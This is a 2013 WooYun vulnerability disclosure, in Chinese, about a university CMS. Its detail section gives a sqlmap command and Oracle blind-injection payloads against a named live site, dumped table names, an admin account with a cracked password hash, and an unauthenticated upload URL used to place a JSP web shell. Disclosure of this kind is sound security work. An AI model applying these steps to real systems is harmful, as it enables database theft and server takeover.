漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-043448
漏洞标题:某大学CMS的任意文件上传漏洞
相关厂商:北京清元优软科技有限公司
漏洞作者: happylyang
提交时间:2013-11-20 11:32
修复时间:2014-02-18 11:33
公开时间:2014-02-18 11:33
漏洞类型:文件上传导致任意代码执行
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-11-20: 细节已通知厂商并且等待厂商处理中
2013-11-24: 厂商已经确认,细节仅向厂商公开
2013-11-27: 细节向第三方安全合作伙伴开放
2014-01-18: 细节向核心白帽子及相关领域专家公开
2014-01-28: 细节向普通白帽子公开
2014-02-07: 细节向实习白帽子公开
2014-02-18: 细节向公众公开
简要描述:
开始是对urp的官网做一次检测,可以对它的cms站进行进行盲注,凭着神一般的耐心找到后台密码。。。上传shell。。。然后又google了一下,发现了几个大学,都在使用这种cms,拿shell超简单,任意文件上传,无需登陆后台。
详细说明:
使用sqlmap跑一下,
./sqlmap.py -u http://www.urpsoft.com/pages/info_list.jsp?classcode=701 --dump --schema --batch --exclude-sysdbs
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: classcode
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: classcode=701%' AND 3788=3788 AND '%'='
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: classcode=701%' AND 7636=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND '%'='
---
[09:54:03] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
Database: QYYR
[141 tables]
+-----------------------------+
| ATTACHMENT_RECORD |
| AUTHMGR_APPPERM |
| AUTHMGR_BMZWB |
| AUTHMGR_GROUPINFO |
| AUTHMGR_GROUP_MEMBER |
| AUTHMGR_MZB |
| AUTHMGR_PZZJG |
| AUTHMGR_ROLE |
| AUTHMGR_USERINFO |
| AUTHMGR_USERINFOEX |
| AUTHMGR_USER_GROUP |
| AUTHMGR_USER_ROLE |
| AUTHMGR_USER_USERTYPE |
| AUTHMGR_XLB |
| AUTHMGR_YHZWB |
| AUTHMGR_ZCB |
| AUTHMGR_ZWB |
| AUTHMGR_ZZJG |
| AUTHMGR_ZZJGTREE |
| BBSFAVOURITETHREAD |
| BBSFORUM |
| BBSFORUMMANAGER |
| BBSMESSAGE |
| BBSTHREAD |
| BGSW_HYHZB |
| BGSW_HYSB |
| BGSW_HYSYDB |
| BGSW_HYS_APPLY_INFO |
| BGSW_HYTZB |
| BGSW_JDCJR |
| BGSW_RCAPB |
| BGSW_RCRYB |
| BGSW_YCANGLB |
| BGSW_YCHEGLB |
| BGSW_YZGLB |
| BG_DHJL |
| BG_JDRC |
| BXLX_BM |
| CALENDAR_ITEM |
| CALENDAR_SERIAL_INFO |
| CONTACT_GROUP |
| CONTACT_GROUP_MEMBER |
| CONTACT_ITEM |
| DEPTPHONE |
| DEPTUSERORDER |
| DEPT_XX |
| DIGESTCATEGORY |
| DIGESTMESSAGE |
| DIGESTOPERATETARGET |
| FILEMANAGER |
。。。。
省略若干
http://www.urpsoft.com/login.jsp,这是后台地址,凭着神一般的耐心,从这么多乱七八糟的表中,竟然找到了登陆账户和密码,
首先找到这个表,其中ZJH为登陆名,
Database: QYYR
Table: AUTHMGR_USERINFO
+---------+-------+-------+----------+------+-------------+
| BUMENID | XM | ZJH | JSZW | XZZW | USERINFOSEQ |
+---------+-------+-------+----------+------+-------------+
| 0 | 쾵춳맜샭풱 | S0009 | 쟥풪폅죭뿆벼폐쿞 | NULL | 267 |
+---------+-------+-------+----------+------+-------------+
Table: AUTHMGR_USERINFOEX
[1 entry]
+----------------------------------------+--------------+
| MM | USERINFO_SEQ |
+----------------------------------------+--------------+
| 202cb962ac59075b964b07152d234b70 (123) | 267 |
+----------------------------------------+--------------+
找到AUTHMGR_USERINFOEX表中对应的USERINFOSEQ,与MM,(密码)
使用ZJH和MM可以登陆后台。
登陆后,发现名字是首都师范大学网站管理系统。。。
在想怎样上传,js源码里看到对各种扩展名进行了过滤,突然发现,这是坑人的,其实是任意文件上传。。根本不需要登陆后台!汗一个。。。
http://www.urpsoft.com/editortpxx/upload1.jsp?type=file&style=config&seq=5507&commtype=tpxx
上传jsp,点击确定后,虽然显示是空白的,但是在html源码里可以看到,<script language=javascript>
parent.UploadSaved('tpxx','../UploadFile/tpxx/20131120105044769/79bb6838bbf3461e3f1493414bfd5dc5.jsp');</script>
我汗,太贴心了,路径都给你了。。。
漏洞证明:
修复方案:
过滤注入,过滤扩展名
版权声明:转载请注明来源 happylyang@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2013-11-24 21:49
厂商回复:
最新状态:
暂无